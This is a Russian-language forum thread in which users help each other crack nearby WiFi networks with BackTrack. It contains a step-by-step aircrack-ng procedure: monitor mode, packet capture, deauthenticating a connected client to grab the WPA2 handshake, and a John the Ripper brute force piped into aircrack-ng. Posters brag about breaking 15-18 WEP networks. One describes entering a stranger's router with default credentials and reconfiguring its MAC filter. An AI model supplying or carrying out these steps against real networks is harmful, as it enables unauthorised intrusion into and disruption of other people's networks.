Это в ВТ-4 надо прописывать Login и Password, но в ВТ-4 эти проги не будут рулить!! Ну а если просит Login #root Password # toor #startx spoonwep2.lzm,SWPA.lzm закинь на другое USB, и вставь его после загрузки ВТ откроешь консоль ком.строки и пишешь airmon-ng Отобразиться список всех доступных WiFi адаптеров. выберешь тот который будешь использовать у меня < mon0 > После набери airmon-ng start {имя адаптера} http://benjy-blog.blogspot.com/2008/07/spoonwep2-prsentation.html http://neovortex.kodings.googlepages.com/spoonwep2vid.htm
что-то не получается запустить WI-fi в ВТ-4 ,может кто знает как ? заранее благодарю ! не вижу сетей чтоб подключится.
Semby68 Привет. Спасибо тебе! Перевёл я карту в режим мониторинга. И сново появилась проблема!Когда я прописываю путь bt# /usr/bin/lzm2dir/mnt/sde1/spoonwep2.lzm/ и bt# /usr/bin/lzm2dir/mnt/sde1/SWPA.lzm/ мне пишет Not a directory! Что это может быть? Я пробывал как с usb так и с системы эти файлы прописывать но ничего не получилось! А когда я захожу в K/backtrack/Radio Network Analysis/80211/All/ то у меня там можно увидеть только Spoonwep! А вот Spoonwep2 и Spoonwpa вообще нет!!! Может чё подскажешь или ещё кто знает?
по командам видно что пропустил несколько пробелов, проще скопируй команды в блокнот и его скинь на usb, и с блокнота копируй команды в консоль и запускайся ,если ты правильно написал что твоё usb отобразилось sde1 то, airmon-ng airmon-ng start rausb0 { в место rausb0 твой драйвер wi-fi карты} /usr/bin/lzm2dir /mnt/sde1/spoonwep2.lzm / /usr/bin/lzm2dir /mnt/sde1/SWPA.lzm / смотри всё тоже но после lzm2di пробел и после .lzm пробел.Да и ещё если usb будешь вытаскивать вставлять то буква будет меняться , например sde1 ,sdb1 ,sdd1,и тд. А потом ищешь как и раньше. Вроде ошибки не должно быть. Удачи !!!
если очень заинтересовал ВТ-3 ? могу отписать команды на взлом WEP с консоли , это быстрее подберёшь ключ чем / Spoonwep2.lzm / !!! semby68
Semby68 Привет, если можешь опиши. В ВТ-3 всё получилось с командами прописать путь к файлам!Спасибо! Ещё вопросик есть. Как взломать сети WiFi с WPA2, WPA2-TSK, WPA-PSP, и т.д?Просто возле меня их много и многие вот с таким шифрованием.Или их не как нельзя!
есть кое что ! но это с ВТ-4 , сам пробую WPA взломать но пока в ожидании , у парня сетка висит WPA а рядом больше ничего нет , так вот уже вторые сутки ВТ-4 крутит, и пока ожидаем результат, по словарям её не вскрыли ,пробуем то что есть в самом ВТ-4. если хочешь попробуй ! скачай ВТ-4 ISO и залей на USB или на CD . Вход в ВТ-4 Login # root дави Enter # toor дави Enter # startx дави Enter Переводишь карту в режим мониторинга. команды которые отпишу закинь в блокнот и блокнот скинь на USB . но когда начинается загрузка ВТ-4 USB должно сразу стоять в компе иначе его не откроешь потом ищи его системе ВТ-4 если не знаешь как ,то просмотри весь ВТ-4 я думаю что найдёшь. Не забудь о правильном копирование или создании команд , иначе Default Для начала переводим карту в режим "monitor mode" : root@bt:~# airmon-ng Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] root@bt:~# airmon-ng start wlan0 Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon0) Сделано, и теперь мы можем использовать карту как mon0 Теперь сканим доступные беспроводные сети, использующие WPA2 / PSK : root@bt:~# airodump-ng mon0 CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet Остановите airodump-ng и запустите его заново, записывая все пакеты в файл: остановить клавиши Ctrl +C , нажать обе. и запускаем заново airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2 В данный момент мы имеем два варианта развития событий: либо дем пока клиент совершит подключение и произойдет процедура авторизации, либо деавторизуем подключенного клиента и тем самым заставим его переподключиться. Время - деньги, поэтому давайте проведем небольшой акт насилия. Нам необходимы bssid точки доступа (-a) и mac адрес подключенного клиента (-c) root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0 13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10 13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs] В результате airodump-ng должен показать “WPA Handshake:” в правом верхнем углу: CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230 Остановите airodump-ng и убедитесь что все необходимые файлы созданы root@bt:/# ls /tmp/wpa2* -al -rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap -rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv -rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv Успешность взлома напрямую зависит от сложности пароля. Другими словами, вам может повезти и вы найдете ключ сразу, или не найдете его совсем. Следующий метод, брутфорс, будет успешным практически наверняка, но может занять очень длительный срок. Необходимо понимать, что ключ WPA2 может содержать до 64-ех символов. Для начала взлома, если вы хотите использовать John The Ripper для создания всех возможных парольных комбинаций, выполните следующую команду. root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap вроде всё так , пробуй , может повезёт . удачи !!!
Спасибо, попробую. А ты если можешь , отпишись, получилось взломать WPA с помошью ВТ-4! Очень интересно! А вот у меня пока ещё ничего не получилось!Не могу взломать никакую сеть хотя всё вроде правильно делаю, пробую каждый день понемногу, а так хочется!
Semby68 Привет. Скажи мне пожалуйста, у тебя получалось взломать WPA или WEP? Я почемуто не могу не какую взломать! Есть и WPA,WPA2 и причём не одна. Есть WEP скрытая, пытался сначало поломать её ,сделал так как ты всё описал,но так ничего и не добился!Может я мало пакетов собираю? Самое большее собрал 250000 примерно!Потом пытался WPA поломать, тоже не чего!Никак не могу впоймать handshake! Рядом с сетью нет клиента, второй способ не помог как ты описывал! Чё мож не так делаю, всё вроде делаю так как ты описал!
WEP сети которые у меня видны я все поломал , даже у родственников в другом городе в ВТ-3 это гдето 15-18 сеток прогой Spoonwep2.lzm,эта прога должна сама определить сколько ей надо пакетов автоматом и выдать тебе ключ ,посмотри внимательно видео , в этой проге атаки можно менять , может мало ждал?
с WPA пока не чего не получается не по словарям не другой командой ,пока собираю словари и другое описание на взлом.
Semby68 Добрый день. Вот я смотрю у тебя когда ты переводишь свой адаптер WiFi мониторить отображается название твоего адаптера WiFi. Это когда ты пишешь в консоли airmon-ng! Я так понял ты используешь USB адаптер?! У меня почему то отображается только wifi0,ath0,ath1! а вот самого точного названия нет! Я выбираю wifi0 всё работает,также и остальные ath0,ath1, сети карта видит!Вопрос, обязательно должно определятся название моей PCI карты WiFi?
забыл довавить!Адаптер которые я вижу: wifi0 » Atheros » madwifi-ng и другая ath0 » Atheros » madwifi-ng VAP ( parent: wifi0 ), а вот PCI адаптера wifi названия нет!
смотри сюда ты наверно мало читал статей # airmon-ng - Enter отображается твой адаптер wifi0 и ath0 , чтоб перевести твою карту в режим мониторинга надо набирать команду ! # airmon-ng start wifi0 - Entr получишь драйвер мониторинга wifi карты ath1 он и является (monitor mode enabled on ath1) # airodump-ng ath1 только с этим драйвером ты можешь собирать пакеты
Всем привет. Попал в такую ситуацию, может кто подскажет выход =) Есть открытая сетька без шифрования, я к ней спокойно подрубался раньше. Ради прикола решил подрубится к роутеру, ввёл айпишник его, ввёл стандартные логин и пароль - и пустило. В связи с частымипадениями скорости инета через данную сеть у меня, решил поиграться с фильтрацией МАС адресов. С удивлением обнаружил, что помимо меня к этой сети подрубаются ещё человек 10. Внёс их МАС-и в список, поставил галочку запрет. Всё стало пошустрее, но почему-то последние 2 МАС-а продолжали беспрепятственно сидеть в сети, и через пару дней. Решил пойти другим способом - внести мой МАС и МАС хозяина в список разрешённых. Для начала удалил все МАС-и, и поставил галочку разрешить заранее.. Не внеся ни один МАС в список. И вот теперь к сети не подрубится, ибо в списке для разрешения доступа нет ни одного МАС адреса! Что можно сделать в данной ситуации?? Пробовал МАС, состоящий из одних нулей - не подключает. Есть какая-то возможность подрубится к данной сети?? ХОтя бы для изменения настроек роутера на по умолчанию???
Semby68 Спасибо.А ты не знаешь как насчёт того допустим если я подключусь с сети это могут увидеть?и другие тоже могут видеть мой адаптер?